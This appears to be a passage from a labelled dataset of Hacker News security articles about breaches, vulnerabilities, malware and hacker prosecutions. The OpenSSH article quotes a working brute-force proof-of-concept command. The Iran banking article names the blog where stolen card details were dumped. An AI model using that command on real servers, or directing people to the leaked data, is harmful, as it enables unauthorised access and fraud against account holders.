This incident once again highlights the dangerous threats of massive DDoS attacks, which are now emerging from Millions of insecure Internet of Things (IoT) devices, whereby attackers can simply launch a DDoS to take down any critical service – no need to infect it with malware or viruses. So the best way to protect your smart devices from being a part of DDoS botnet is to be more vigilant about the security of your internet-connected devices. ",Cyber_Attack Banking System Vulnerability - 3 million bank accounts hacked in Iran,https://thehackernews.com/2012/04/banking-system-vulnerability-3-million.html,"Banking System Vulnerability - 3 million bank accounts hacked in Iran Iran's Central Bank has announced that the electronic information of 3 million customers of 10 Iranian banks have been compromised. These banks now require their customers to change their ATM pin numbers before they can access their account. This has caused a rush to the ATM machines by the worried customers. The hacker was identified as Khosro Zare', a former bank-system specialist in Iran who recently left the country.Zare' claimed in a blog that he hacked the PIN codes to highlight the vulnerability of Iran's banking system. According to the report, the hacker had provided the managing directors of the targeted banks with information about the bank accounts of 1000 customers in the previous Iranian calendar year (ended on March 19) to warn them about the susceptibility of their computer systems and networks to cyber threats. But Central bank officials had earlier downplayed the reports, saying that ""the threat to Iran's banking system is not serious."" Finally to proof the Vulnerability he dumped the account details of around 3 million individuals, including card numbers and PINs, on his blog ircard.blogspot.ca. At least three Iranian banks (Saderat, Eghtesad Novin, and Saman) have already sent text messages to their clients, warning them to change their debit card PINs. The warning was repeated on state TV channels. ",Vulnerability Popular Online Tutoring Marketplace 'Wyzant' Suffers Data Breach,https://thehackernews.com/2019/05/wyzant-data-breach.html,"Wyzant—an online marketplace that makes it easy for parents and students to connect with private tutors, in-person and online, in over 250 different subjects—has suffered a data breach exposing ""certain personal identification information"" for its customers. The Hacker News received a copy of an email notification Wyzant recently sent to its affected customers, which reveals an unknown attacker was able to gain access to one of its databases on April 27, which the company identified a week after the security incident. The stolen personal identification information for affected customers includes their first name, last name, email address, zip code, and, for certain customers, their Facebook profile image as well who log-in to the platform using Facebook. Wyzant also explicitly made it clear that the stolen data did not include any password, payment information, or record of its customers' activity on the Wyzant platform, and that no other than the above-mentioned data was known to have been accessed. Though it is still unclear how many customers were actually hit by the security breach, or if both tutors and students are affected, or what security hole the unknown attackers exploited to get into the company's network, the company did confirm that it has now patched the underlying issue. With more than 2 million registered users and over 76,000 active tutors in its database, Wyzant is a decade-old popular tutoring service that bring students and instructors together, online and in-person. In response to the security incident, Wyzant says it is performing an extensive audit of its entire network and application security infrastructure and will notify its customers of any significant development. ""Wyzant has implemented additional security measures designed to prevent a recurrence of such an attack and to protect the privacy of our valued customers,"" the company says. ""This includes reviewing our security processes and protocols. We are also working closely with law enforcement to ensure the incident is properly addressed."" For affected customers, Wyzant also warned them to beware of potential phishing attacks wherein attackers could use their personal information to trick them into providing additional personal information, such as credit card information or passwords. The Hacker News has reached out to the company to know more about the data breach incident and will update this article as soon as we'll hear back from it. ",Cyber_Attack Yahoo Flaw Allowed Hackers to Read Anyone's Emails,https://thehackernews.com/2016/12/hack-yahoo-email.html,"Yahoo has patched a critical security vulnerability in its Mail service that could have allowed an attacker to spy on any Yahoo user's inbox. Jouko Pynnönen, a Finnish Security researcher from security firm Klikki Oy, reported a DOM based persistent XSS (Cross-Site Scripting) in Yahoo mail, which if exploited, allows an attacker to send emails embedded with malicious code. In his blog post published today, the researcher demonstrated how a malicious attacker could have sent the victim's inbox to an external site, and created a virus that attached itself to all outgoing emails by secretly adding a malicious script to message signatures. Since the malicious code is in the message's body, the code will get executed as soon as the victim opens the boobytrapped email and its hidden payload script will covertly submit victim's inbox content to an external website controlled by the attacker. This issue is because Yahoo Mail failed to properly filter potentially malicious code in HTML emails. ""It would be possible to embed a number of HTML attributes that are passed through Yahoo's HTML filter and treated specially,"" Pynnönen says in his blog post. Pynnönen says he found the vulnerability by force-feeding all known HTML tags and attributes in order to the filter that Yahoo uses to weed out malicious HTML, but certain malicious HTML code managed to pass through. ""As a proof of concept I supplied Yahoo Security with an email that, when viewed, would use AJAX to read the user's inbox contents and send it to the attacker's server,"" Pynnönen says. Pynnönen privately disclosed the vulnerability to Yahoo through its HackerOne bug bounty program and was awarded a $10,000 bounty. Pynnönen reported a similar vulnerability in the web version of the Yahoo! Mail service earlier this year for which he earned $10,000. He also reported a stored XSS vulnerability in Flickr to Yahoo in December 2015 for which he earned $500. ",Vulnerability "FBI, CISA, NSA Officially Blame Russia for SolarWinds Cyber Attack",https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html,"The U.S. government on Tuesday formally pointed fingers at the Russian government for orchestrating the massive SolarWinds supply chain attack that came to light early last month. ""This work indicates that an Advanced Persistent Threat (APT) actor, likely Russian in origin, is responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks,"" the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA) said in a joint statement. Russia, however, denied any involvement in the operation on December 13, stating it ""does not conduct offensive operations in the cyber domain."" The FBI, CISA, ODNI, and NSA are members of the Cyber Unified Coordination Group (UCG), a newly-formed task force put in place by the White House National Security Council to investigate and lead the response efforts to remediate the SolarWinds breach. A Much Smaller Number Compromised Calling the campaign an ""intelligence gathering effort,"" the intelligence bureaus said they are currently working to understand the full scope of the hack while noting that fewer than 10 U.S. government agencies were impacted by the compromise. The names of the affected agencies were not disclosed, although previous reports have singled out the U.S. Treasury, Commerce, State, and the Departments of Energy and Homeland Security among those that have detected tainted SolarWinds' network management software installations, not to mention a number of private entities across the world. An estimated 18,000 SolarWinds customers are said to have downloaded the backdoored software update, but the UCG said only a smaller number had been subjected to ""follow-on"" intrusive activity on their internal networks. Microsoft's analysis of the Solorigate modus operandi last month found that the second-stage malware, dubbed Teardrop, has been selectively deployed against targets based on intel amassed during an initial reconnaissance of the victim environment for high-value accounts and assets. The joint statement also confirms previous speculations that linked the espionage operation to APT29 (or Cozy Bear), a group of state-sponsored hackers associated with the Russian Foreign Intelligence Service (SVR). The hacking campaign was notable for its scale and stealth, with the attackers leveraging the trust associated with SolarWinds Orion software to spy on government agencies and other companies for at least nine months, including viewing source code and stealing security tools, by the time it was discovered. SolarWinds Faces Class Action Lawsuit Meanwhile, SolarWinds is facing further fallout after a shareholder of the IT infrastructure management software company filed a class-action lawsuit in the U.S. District Court for the Western District of Texas on Monday against its president, Kevin Thompson, and chief financial officer, J. Barton Kalsu, claiming the executives violated federal securities laws under the Securities Exchange Act of 1934. The complaint states that SolarWinds failed to disclose that ""since mid-2020, SolarWinds Orion monitoring products had a vulnerability that allowed hackers to compromise the server upon which the products ran,"" and that ""SolarWinds' update server had an easily accessible password of 'solarwinds123',"" as a result of which the company ""would suffer significant reputational harm."" ",Cyber_Attack Flame Malware Spread Via Rogue Microsoft Security Certificates,https://thehackernews.com/2012/06/flame-malware-spread-via-rogue.html,"Flame Malware Spread Via Rogue Microsoft Security Certificates Microsoft released an emergency Windows update on Sunday after revealing that one of its trusted digital signatures was being abused to certify the validity of the Flame malware that has infected computers in Iran and other Middle Eastern Countries. The patch revoked three intermediate Microsoft certificates used in active attacks to ""spoof content, perform phishing attacks, or perform man-in-the-middle attacks"".Microsoft also killed off certificates that were usable for code signing via Microsoft's Terminal Services licensing certification authority (CA) that ultimately ""chained up"" to the Microsoft Root Authority.The authority issued certificates for users to authorise Remote Desktop services in their enterprises. The Microsoft blog post explains that a vulnerability in an old cryptography algorithm is exploited by some elements of Flame to make them appear as if they originated from Microsoft. Most systems around the world accept officially-signed Microsoft code as safe by default, so the malware would enter unnoticed. Windows users are urged to install the new KB2718704 patch. If you enabled Automatic Updates, the patch should automatically install. If not, you can open Windows Update on your PC and manually install it. Since the virus is highly targeted and can be caught by most antivirus programs, the ""vast majority of customers are not at risk,"" according to Microsoft. ",Malware Google announces $2.7 million Reward for hacking Chrome OS at Pwnium Contest,https://thehackernews.com/2014/01/google-announces-27-million-reward-for.html,"Pwnium is the annual Hacking competition where Google invites coders from around the world to find security holes in Google Chrome. Google has announced its 4th Pwnium Hacking Contest hosted at the Canadian Security conference in March, offering more than $2.7 million in potential rewards for hacking Chrome OS-running ARM and Intel Chromebook. This year the security researchers have a choice in between an ARM-based Chromebook, the HP Chromebook 11 (WiFi) and the Acer C720 Chromebook (2GB WiFi) based on Intel's Haswell microarchitecture. The attack must be demonstrated against one of these devices running ""then-current"" stable version of Chrome OS. ""Security is a core tenet of Chromium, which is why we hold regular competitions to learn from security researchers. Contests like Pwnium help us make Chromium even more secure,"" Jorge Lucángeli Obes, Google Security Engineer said. Amongst the payouts are $110,000 for the browser or system-level compromise in guest mode or as a logged-in user, delivered via a web page. Google will also pay USD 150,000 for providing an exploit, able to persistently compromise an HP or Acer Chromebook, i.e. hacking the device to retain control even after a reboot. Google further revealed that it will be giving out bonuses to all those who come up with an impressive exploit to defeat kASLR, exploiting memory corruption in the 64-bit browser process or exploiting the kernel directly from a renderer process. The full exploit must be given to Google with explanations for all individual bugs used. ""To register, email pwnium4@chromium.org. Registration will close at 5:00 p.m. PST Monday, March 10th, 2014. Only exploits demonstrated on time in this specifically-arranged window will be eligible for a reward."" The earlier editions of Pwnium competitions focussed on Intel-based Chrome OS devices, and Google had paid out $50,000 to a prolific hacker who goes by ""Pinkie Pie,"" for an exploit. Do you think you are up to the task? Gear up your keyboards & Give it a try! ",Vulnerability Bitcoin Core Software Patches a Critical DDoS Attack Vulnerability,https://thehackernews.com/2018/09/bitcoin-core-software.html,"The Bitcoin Core development team has released an important update to patch a major DDoS vulnerability in its underlying software that could have been fatal to the Bitcoin Network, which is usually known as the most hack-proof and secure blockchain. The DDoS vulnerability, identified as CVE-2018-17144, has been found in the Bitcoin Core wallet software, which could potentially be exploited by anyone capable of mining BTC to crash Bitcoin Core nodes running software versions 0.14.0 to 0.16.2. In other words, Bitcoin miners could have brought down the entire blockchain either by overflooding the block with duplicate transactions, resulting in blockage of transaction confirmation from other people or by flooding the nodes of the Bitcoin P2P network and over-utilizing the bandwidth. The vulnerability had been around since March last year, but the team says nobody noticed the bug or nobody was willing to incur the expense of exploiting it. According to the bitcoin core developers, all recent versions of the BTC system are possibly vulnerable to the Distributed Denial of Service (DDoS) attacks, though there's a catch—attacking Bitcoin is not cheap. The DDoS attack on the BTC network would cost miners 12.5 bitcoins, which is equal to almost $80,000 (£60,000), in order to perform successfully. The Bitcoin Core team has patched the vulnerability and are urging miners to update with the latest Bitcoin Core 0.16.3 version as soon as possible. ""A denial-of-service vulnerability (CVE-2018-17144) exploitable by miners has been discovered in Bitcoin Core versions 0.14.0 up to 0.16.2. It is recommended to upgrade any of the vulnerable versions to 0.16.3 as soon as possible,"" the vulnerability note reads. Although the team says that the miners running Bitcoin Core only occasionally are not in danger of such attacks, it would obviously be recommended to upgrade to the latest software version as soon as possible just to be on the safe side. In addition to the DDoS vulnerability, the latest version also includes patches for a non-insignificant number of minor bugs, related to consensus, RPC and other APIs, invalid error flags, and documentation. After upgrading to the latest version—the process that will take five minutes to half an hour depending upon the processing power of your computer—users should note that the new wallet will have to redownload the entire blockchain. ",Vulnerability Potential backdoors discovered in US-based components used by French Satellites,https://thehackernews.com/2014/01/potential-backdoors-discovered-in-us.html,"United Arab Emirates (UAE) may terminate a $930 Million USD contract with France based companies for the supply of two two military Imaging satellites due to the discovery of several US produced components in them. Now the deal is in danger because the UAE claims it has discovered backdoors in the components which are manufactured in the United States, reported by the Defense News. The contract, sealed in July 2013, includes a ground station, the Pleiades-type satellites (aka Falcon Eye) are due for delivery 2018. The revelation was provided by high-level UAE sources, the companies involved in the business are the prime contractor Airbus Defense and Space, and payload maker Thales Alenia Space. ""If this issue is not resolved, the UAE is willing to scrap the whole deal,"" he added. UAE authorities suspect the presence of vulnerabilities would ""provide a back door to the highly secure data transmitted to the ground station"". An unnamed UAE source has confirmed that the presence of backdoor has been reported to Sheikh Mohammed Bin Zayed, deputy supreme commander of the UAE's armed forces. The contract signed with French companies includes two high-resolution observation satellites and the operational support from France with training for 20 engineers. UAE representatives are evaluating alternative partners for the supply, Russian industry may be more likely supplier. ""The UAE has drawn on Russian technology, with the GLONASS space-based navigation system fitted as a redundancy feature on a Western European weapon system,"" a French defense expert said. While some security experts believe that French industry had drawn on the US technology due complexity of the payload, other specialists found intriguing that France had drawn on US technology for the satellites under the Falcon Eye program. ""France operates the Pleiades spy satellite in what is viewed as a critical piece of the nation's sovereignty. Given that core competence, it seemed strange that France would use US technology, although there is an agreement between Paris and Washington over transfer of capabilities, "" said a Defense analysts. The Defense News also speculated on the fact that the claims may be an attempt to condition another contract for Dassault Aviation Rafale fighters, both French companies were available for comment. ",Data_Breaches Warning: 10 Million UK Users targeted with Cryptolocker Ransomware spam email campaign,https://thehackernews.com/2013/11/Cryptolocker-Ransomware-spam-emails-campaign-ten-million-users.html,"The UK's National Crime Agency has given out an urgent national alert that a mass spamming event targeting 10 million UK based email users with a piece of malware called CryptoLocker that encrypts your files and then demands a ransom money to restore access. The agency has said that the people who are majorly receiving targeted spam emails that appear to be from banks and other financial institutions. Each email comes with attachments that look like files such as a voicemail, fax, an invoice or details of a suspicious transaction, but is in fact Cryptolocker Ransomware malware that encrypts the user's computer. The public should be aware not to click on any such attachment. On Infected system, The Cryptolocker Malware screen will then display a countdown timer that demands the payment of 2 Bitcoins in ransom, worth around £536, for the decryption key. The NCCU is trying to trace that who is sending the emails. ""We are working in cooperation with industry and international partners to identify and bring to justice those responsible and reduce the risk to the public."" Lee Miles, Deputy Head of the NCCU says. Bitdefender Labs, an anti-virus company found that in the week beginning Oct. 27, more than 12,000 computers were infected and before the criminal group seemed to be exclusively targeting computers in the U.S. The UK crime agency said it advised users not to pay the ransom and warned that even if it were paid, there was no guarantee the encryption key would be turned over. Anyone whose computer is infected should report it to www.actionfraud.police.uk. NCA has put out a few recommendations to avoid infection including, files should be backed up routinely and preserved off the network. Read more detailed articles on Cryptolocker Ransomware: Cryptolocker Ransomware makes different Bitcoin wallet for each victim CryptoLocker Ransomware demands $300 or Two Bitcoins to decrypt your files CryptoLocker developer launches Decryption Service website; 10 Bitcoins for Decryption Keys ",Malware COVID-19: Hackers Begin Exploiting Zoom's Overnight Success to Spread Malware,https://thehackernews.com/2020/03/zoom-video-coronavirus.html,"As people increasingly work from home and online communication platforms such as Zoom explode in popularity in the wake of coronavirus outbreak, cybercriminals are taking advantage of the spike in usage by registering new fake ""Zoom"" domains and malicious ""Zoom"" executable files in an attempt to trick people into downloading malware on their devices. According to a report published by Check Point and shared with The Hacker News, over 1,700 new ""Zoom"" domains have been registered since the onset of the pandemic, with 25 percent of the domains registered in the past seven days alone. ""We see a sharp rise in the number of 'Zoom' domains being registered, especially in the last week,"" said Omer Dembinsky, Manager of Cyber Research at Check Point. ""The recent, staggering increase means that hackers have taken notice of the work-from-home paradigm shift that COVID-19 has forced, and they see it as an opportunity to deceive, lure, and exploit. Each time you get a Zoom link or document messaged or forwarded to you, I'd take an extra look to make sure it's not a trap."" With over 74,000 customers and 13 million monthly active users, Zoom is one of the most popular cloud-based enterprise communication platforms that offers chat, video and audio conferencing, and options to host webinars and virtual meetings online. The popularity of Zoom has shot up significantly in recent weeks as millions of students, business people, and even government employees across the world are forced to work and socialize from home during the coronavirus pandemic. The report comes following a significant increase in the number of malicious coronavirus-related domains, with bad actors finding new ways to profit off the global health concern to stage a variety of malware attacks, phishing campaigns, and create scam sites and malicious tracker apps. What's more, the researchers said they detected malicious files with the name ""zoom-us-zoom_##########.exe,"" which when executed, installed potentially unwanted programs (PUPs) such as InstallCore, a dodgy bundleware application that's known to install other kinds of malware. But Zoom is not the only app to be targeted by cybercriminals. With schools turning to online learning platforms to keep students occupied, Check Point researchers said they also discovered phishing sites masquerading as the legitimate Google Classroom (e.g., googloclassroom\.com and googieclassroom\.com) website to trick unwitting users into downloading malware. Zoom Fixes Privacy Issue in Its iOS App Zoom, for its part, has had its share of privacy and security issues too. Last year, the video conferencing app fixed a vulnerability that could let websites hijack users' webcam and ""forcibly"" join them to a Zoom call without their permission. Then earlier this January, the company squashed another bug that could have allowed attackers to guess a meeting ID and join an unprotected meeting, potentially exposing private audio, video, and documents shared throughout the session. Following the disclosure, Zoom introduced default passwords for each meeting that participants need to enter when joining by manually entering the meeting ID. And finally, just over the weekend, Zoom updated its iOS app after it was caught sending device information and a unique advertiser identifier to Facebook using the social network's software development kit (SDKs) and concerns were raised over its failure to disclose the data sharing in its privacy policy. Highlighting some of the privacy risks associated with using Zoom's products, The Electronic Frontier Foundation (EFF) said hosts of Zoom calls can see if participants have the Zoom video window active or not to track if they are paying attention. Administrators can also see the IP address, location data, and device information of each participant. To safeguard yourself from such threats, it's essential that the apps are kept up-to-date, and be on the lookout for emails from unknown senders and lookalike domains that contain spelling errors. Besides this, also don't open unknown attachments or click on promotional links in the emails, the cure for Corona will not arrive via email, and also ensure you're ordering goods from only authentic sources. ",Malware Bug in OpenSSH Opens Linux Machines to Password Cracking Attack,https://thehackernews.com/2015/07/openssh-password-cracking.html,"A simple but highly critical vulnerability recently disclosed in the most widely used OpenSSH software allows attackers to try thousands of password login attempts per connection in a short period. OpenSSH is the most popular software widely used for secure remote access to Linux-based systems. Generally, the software allows 3 to 6 Password login attempts before closing a connection, but a new vulnerability lets attackers perform thousands of authentication requests remotely. OpenSSH servers with keyboard-interactive authentication enabled, including FreeBSD Linux, can be exploited to carry out the brute force attack on OpenSSH protocol, a security researcher with online alias KingCope explained in a blog post. Exploit for the Vulnerability RELEASED Hackers could widely exploit the vulnerability because the keyboard-interactive authentication is by default enabled on most of the systems. Researcher has also released a proof-of-concept exploit code, which is just a command, as follows: ssh -lusername -oKbdInteractiveDevices=`perl -e 'print ""pam,"" x 10000'` targethost This simple command effectively allows up to 10,000 password attempts within two minutes of login grace time. ""The crucial part is that if the attacker requests 10,000 keyboard-interactive devices OpenSSH will gracefully execute the request and will be inside a loop to accept passwords until the specified devices are exceeded,"" KingCope said. However, depending on the connection and the victim's Linux machine, two minutes of 'grace period' and thousands of login attempts are enough to achieve successful login by using dictionary attack with a word-list of most commonly used passwords. The vulnerability is present in the latest version of OpenSSH, which is Version 6.9. How to Mitigate the Attack? Administrators are advised to take following precautions until OpenSSH releases an official patch to address the issue: Use a cryptographic key pair that is at least 2,048 Bits in length Always Use a Strong Password to protect your Private Key Reducing the grace period to 20 or 30 seconds Use Fail2Ban or Pam-Shield to limit failed login attempts ",Vulnerability Samba Service Hit By Remote Code Execution Vulnerability,https://thehackernews.com/2015/02/samba-service-hit-by-remote-code.html,"A critical vulnerability has been fixed in Samba — Open Source standard Windows interoperability suite of programs for Linux and Unix, that could have allowed hackers to remotely execute an arbitrary code in the Samba daemon (smbd). Samba is an open source implementation of the SMB/CIFS network file sharing protocol that works on the majority of operating systems available today, which allows a non-Windows server to communicate with the same networking protocol as the Windows products. Samba is supported by many operating systems including Windows 95/98/NT, OS/2, and Linux. smbd is the server daemon of Samba which provides file sharing and printing services to clients using the SMB/CIFS protocol. Samba is also sometimes installed as a component of *BSD and OS X systems. The vulnerability, designated as CVE-2015-0240, actually resides in this smbd file server daemon. The bug can be exploited by hackers to potentially execute code remotely with root privileges, the Samba development team warned. The team discovered that the vulnerability allowed a malicious client to send some packets that could free memory in a consecutive anonymous netlogon packet, leading to unexpected execution of random code. In case, root privileges are required which is automatic and no login or authentication is necessary. The security vulnerability affects all versions of the Samba software, from the oldest supported stable release, Samba versions 3.5.0, to the current development version, 4.2.0 Release Candidate (RC) 4, the Samba Project said in a security alert. Red Hat product team published a detailed analysis of this vulnerability on its blog post. According to the researchers, Red Hat Enterprise Linux versions 5 through 7 are affected, as are Red Hat Storage Server versions 2.1 and 3. Except RHEL7, the vulnerability is marked critical for all of the affected products. Other Linux distributions have also posted security alerts about the vulnerability. A large number of users might potentially be at risk because Samba ships with a wide range of Linux distributions. However, users affected by the critical vulnerability also depends on which operating system they run on their machines. The Samba development team has fixed the flaw in the new Samba version, Samba 4.1.17, which is available to download. The credit for discovering and reporting the flaw in Samba goes to the Microsoft Vulnerability Researcher, Richard van Eeden, who also provided the patch. Meanwhile, other major Linux distributions, including Ubuntu, Debian and Suse, have also released updated packages in their repositories, with others to follow soon. ",Vulnerability Microsoft Patches Two Zero-Day Flaws Under Active Attack,https://thehackernews.com/2018/05/microsoft-patch-tuesday.html,"It's time to gear up for the latest May 2018 Patch Tuesday. Microsoft has today released security patches for a total of 67 vulnerabilities, including two zero-days that have actively been exploited in the wild by cybercriminals, and two publicly disclosed bugs. In brief, Microsoft is addressing 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity. These patch updates address security flaws in Microsoft Windows, Internet Explorer, Microsoft Edge, Microsoft Office, Microsoft Office Exchange Server, Outlook, .NET Framework, Microsoft Hyper-V, ChakraCore, Azure IoT SDK, and more. 1) Double Kill IE 0-day Vulnerability The first zero-day vulnerability (CVE-2018-8174) under active attack is a critical remote code execution vulnerability that was revealed by Chinese security firm Qihoo 360 last month and affected all supported versions of Windows operating systems. Dubbed ""Double Kill"" by the researchers, the vulnerability is notable and requires prompt attention as it could allow an attacker to remotely take control over an affected system by executing malicious code remotely through several ways, such as a compromised website, or malicious Office documents. The Double Kill vulnerability is a use-after-free issue which resides in the way the VBScript Engine (included in all currently supported versions of Windows) handles objects in computer memory, allowing attackers to execute code that runs with the same system privileges as of the logged-in user. ""In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked 'safe for initialization' in an application or Microsoft Office document that hosts the IE rendering engine,"" Microsoft explains in its advisory. ""The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability."" Users with administrative rights on their systems are impacted more than the ones with limited rights, as an attacker successfully exploiting the vulnerability could take control of an affected system. However, that doesn't mean that low-privileged users are spared. If users are logged in on an affected system with more limited rights, attackers may still be able to escalate their privileges by exploiting a separate vulnerability. Researchers from Qihoo 360 and Kaspersky Labs found that the vulnerability was actively being exploited in the wild by an advanced state-sponsored hacking group in targeted attacks, but neither Microsoft nor Qihoo 360 and Kaspersky provided any information on the threat group. 2) Win32k Elevation of Privilege Vulnerability The second zero-day vulnerability (CVE-2018-8120) patched this month is a privilege-escalation flaw that occurred in the Win32k component of Windows when it fails to properly handle objects in computer memory. Successful exploitation of the flaw can allow attackers to execute arbitrary code in kernel mode, eventually allowing them to install programs or malware; view, edit or delete data; or create new accounts with full user rights. The vulnerability is rated ""important,"" and only affects Windows 7, Windows Server 2008 and Windows Server 2008 R2. The issue has actively been exploited by threat actors, but Microsoft did not provide any detail about the in-the-wild exploits. Two Publicly Disclosed Flaws Microsoft also addressed two ""important"" Windows vulnerabilities whose details have already been made public. One of these is a Windows kernel flaw (CVE-2018-8141) that could lead to information disclosure, and the other is a Windows Image bug (CVE-2018-8170) that could lead to Elevation of Privilege. In addition, the May 2018 updates resolve 20 more critical issues, including memory corruptions in the Edge and Internet Explorer (IE) scripting engines and remote code execution (RCE) vulnerabilities in Hyper-V and Hyper-V SMB. Meanwhile, Adobe has also released its Patch Tuesday updates, addressing five security vulnerabilities—one critical bug in Flash Player, one critical and two important flaws in Creative Cloud and one important bug in Connect. Users are strongly advised to install security updates as soon as possible in order to protect themselves against the active attacks in the wild. For installing security updates, head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually. ",Cyber_Attack "Hacker Who Hacked US Spy Chief, FBI & CIA Director Gets 5-Year in Prison",https://thehackernews.com/2017/09/crackas-with-attitude-hackers.html,"Remember ""Crackas With Attitude""? The hacking group behind a series of embarrassing hacks that targeted personal email accounts of senior officials at the FBI, the CIA, and the White House, among other United States federal agencies in 2015. A member of Crackas With Attitude, who was arrested last year in September, has now been sentenced to five years in federal prison. Justin Liverman, a 25-year-old man from Morehead City, who was known under the online alias ""D3F4ULT,"" was arrested last year along with another member of the group—Andrew Otto Boggs, 23, of North Wilkesboro, who allegedly used the handle ""INCURSIO."" The duo hacked into multiple government organizations between October 2015 and February 2016. Boggs was sentenced to two years in prison on June 30, 2017, for his role. Liverman pleaded guilty on January 6 this year to conspiracy to hack U.S. government computers and accounts and was sentenced to 5 years in prison on Friday. He will also be forced to pay $145,000 in restitution. According to the plea agreement, ""beginning in November 2015, Liverman conspired to attempt to intimidate and harass U.S. officials and their families by gaining unauthorized access to victims' online accounts, among other things."" ""Liverman publicly posted online documents and personal information unlawfully obtained from a victim's personal account; sent threatening text messages to the same victim's cellphone; and paid an unlawful 'phonebombing' service to call the victim repeatedly with a threatening message,"" U.S. prosecutors in the Eastern District Court of Virginia said. Crackas With Attitude targeted more than ten U.S. government officials including the following and caused more than $1.5 million in losses to victims: Hacked into the AOL email of former CIA director John Brennan and released personal details. Hacked into the personal emails and phone accounts of the former US spy chief James Clapper. Broke into the AOL email of the Ex FBI Deputy Director Mark Giuliano. The hacking group also leaked the personal details of 31,000 government agents belonging to almost 20,000 FBI agents, 9,000 Department of Homeland Security officers, and some number of DoJ staffers. According to the federal officials, the hacking group used social engineering to trick victims into revealing their account numbers, passwords, and other sensitive details, using which they gained access to their accounts. However, a 17-year-old British teenager, who is known as CRACKA and the leader of the ""Crackas With Attitude"" hacking group, is actually responsible for carrying out the above attacks. His prosecution is still ongoing in the United Kingdom. ",Cyber_Attack Google App Engine — More than 30 Vulnerabilities Discovered,https://thehackernews.com/2014/12/google-app-engine-hosting-security.html,"Security researchers have discovered a number of critical vulnerabilities in the Java environment of the Google App Engine (GAE) that enables attackers to bypass critical security sandbox defenses. Google App Engine is Google's PaaS (Platform as a Service) Cloud computing Platform for developing and hosting web applications in Google-managed data centers. GAE offers to run custom-built programs using a wide variety of popular languages and frameworks, out of which many are built on the Java environment. The vulnerabilities was reported by Security Explorations, the same security research company that carried out multiple researches related to Java in past. The discovery was announced on the Full Disclosure security mailing list by Adam Gowdiak, founder and CEO of Security Explorations. According to the security firm, the flaws can be exploited by attackers to achieve a complete Java VM security sandbox escape, as well as to execute an arbitrary code. The researchers estimate that the number of issues is ""30+ in total."" By exploiting the vulnerabilities, security researchers were able to bypass Google App Engine whitelisting of JRE Classes and gain access to full JRE (Java Runtime Environment). They discovered 22 full Java VM security sandbox escape issues and were able to exploit 17 of them successfully. Moreover, the researchers were able to execute native code, specifically to issue arbitrary library/system calls and to gain access to the files (binary/classes) comprising the JRE sandbox. They even siphoned off DWARF information from binary files, PROTOBUF definitions from Java classes and PROTOBUF definition from binary files among others. However, the researchers have been unable to finish their research because Google suspended their test Google App Engine account. ""Unfortunately, we cannot complete our work due to the suspension of the ""test"" GAE account that took place today,"" Gowdiak wrote. ""Without any doubt this is an opsec failure on our end (this week we did poke a little bit more aggressively around the underlying OS sandbox / issued various system calls in order to learn more about the nature of the error code 202, the sandbox itself, etc.)."" As Google has generally been supportive and helpful to the security research community, Researchers at the security firm believes that Google will allow them to complete their research and re-enable their Google App Engine account. ",Vulnerability "To Protect Your Devices, A Hacker Wants to Hack You Before Someone Else Does",https://thehackernews.com/2017/04/vigilante-hacker-iot-botnet.html,"It should be noted that hacking a system for unauthorised access that does not belong to you is an illegal practice, no matter what's the actual intention behind it. Now I am pointing out this because reportedly someone, who has been labeled as a 'vigilante hacker' by media, is hacking into vulnerable 'Internet of Things' devices in order to supposedly secure them. This is not the first time when any hacker has shown vigilance, as we have seen lots of previous incidents in which hackers have used malware to compromise thousands of devices, but instead of hacking them, they forced owners to make them secure. Dubbed Hajime, the latest IoT botnet malware, used by the hacker, has already infected at least 10,000 home routers, Internet-connected cameras, and other smart devices. But reportedly, it's an attempt to wrestle their control from Mirai and other malicious threats. Mirai is an IoT botnet that threatened the Internet last year with record-setting distributed denial-of-service attacks against the popular DNS provider Dyn last October. The botnet designed to scan for IoT devices that are still using default passwords. How the Hajime IoT Botnet Works Hajime botnet works much like Mirai — it spreads via unsecured IoT devices that have open Telnet ports and uses default passwords — and also uses the same list of username and password combinations that Mirai botnet is programmed to use, with the addition of two more. However, what's interesting about Hajime botnet is that, unlike Mirai, it secures the target devices by blocking access to four ports (23, 7547, 5555, and 5358) known to be vectors used to attack many IoT devices, making Mirai or other threats out of their bay. Unlike Mirai, Hajime uses a decentralized peer-to-peer network (instead of command and control server) to issue commands and updates to infected devices, which makes it more difficult for ISPs and Internet backbone providers to take down the botnet. Hajime botnet also takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult. Besides this, Hajime botnet also lacks DDoS capabilities or any other hacking code except for the propagation code that lets one infected device search for other vulnerable devices and infects them. One of the most interesting things about Hajime: the botnet displays a cryptographically signed message every 10 minutes or so on terminals. The message reads: Just a white hat, securing some systems. Important messages will be signed like this! Hajime Author. Contact CLOSED Stay sharp! There's Nothing to Get Excited No doubt, there's a temptation to applaud Hajime, but until users don't reboot their hacked devices. Since Hajime has no persistence mechanism, which gets loaded into the devices' RAM, once the IoT device is rebooted, it goes back to its unsecured state, complete with default passwords and the Telnet port open to the world. ""One day a device may belong to the Mirai botnet, after the next reboot it could belong to Hajime, then the next any of the many other IoT malware/worms that are out there scanning for devices with hard coded passwords. This cycle will continue with each reboot until the device is updated with a newer, more secure firmware,"" the Symantec researchers explained. There's another problem... Hacking someone to prevent hacking is not a thing, that's why we are also concerned about a related amendment passed by the United States — Rule 41 — which grants the FBI much greater powers to legally break into computers belonging to any country, take data, and engage in remote surveillance. So, the most concerning issue of all — Is there any guarantee that the author of Hajime will not add attack capabilities to the worm to use the hijacked devices for malicious purposes? ",Cyber_Attack IT Firm Manager Arrested in the Biggest Data Breach Case of Ecuador's History,https://thehackernews.com/2019/09/ecuador-data-breach.html,"Ecuador officials have arrested the general manager of IT consulting firm Novaestrat after the personal details of almost the entire population of the Republic of Ecuador left exposed online in what seems to be the most significant data breach in the country's history. Personal records of more than 20 million adults and children, both dead and alive, were found publicly exposed on an unsecured Elasticsearch server by security firm vpnMentor, which made the discovery during its large-scale mapping 